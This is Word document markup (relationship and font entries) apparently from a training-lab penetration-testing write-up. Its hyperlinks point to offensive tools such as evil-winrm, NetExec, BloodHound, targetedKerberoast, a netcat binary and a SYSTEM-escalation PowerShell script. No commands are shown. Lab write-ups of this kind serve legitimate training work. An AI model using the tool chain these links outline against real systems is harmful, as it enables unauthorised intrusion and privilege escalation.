        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284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3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4.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/int0x33/nc.exe/blob/master/nc64.exe" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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5.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/decoder-it/psgetsystem/refs/heads/master/psgetsys.ps1" TargetMode="External"/><Relationship Id="rId4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app.hackingclub.com/training/training-machines/272#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Pennyw0rth/NetExec" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/ldapdomaindump" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Pennyw0rth/NetExec" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/ldapdomaindump" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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BMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular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9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RwJ0gooNxWGo29PYVmlVMSk82Q==">CgMxLjAyDmguZmx0dzd6NTcxYnRsMg5oLjlsMmxzYnczZmJ6NTIOaC5kNmZvOGg1b3hkYnYyDWguOHlnZ3NveDFpYnYyDmguanhhZGh5ZXdiczM3Mg5oLmw1d214cnVzOXl2ZjIOaC51ajMwa2d0dzk4czE4AHIhMVNvdTlTTlJjdWM1V3VTUjYzWVBKbjFIaVFrRl9kWkxV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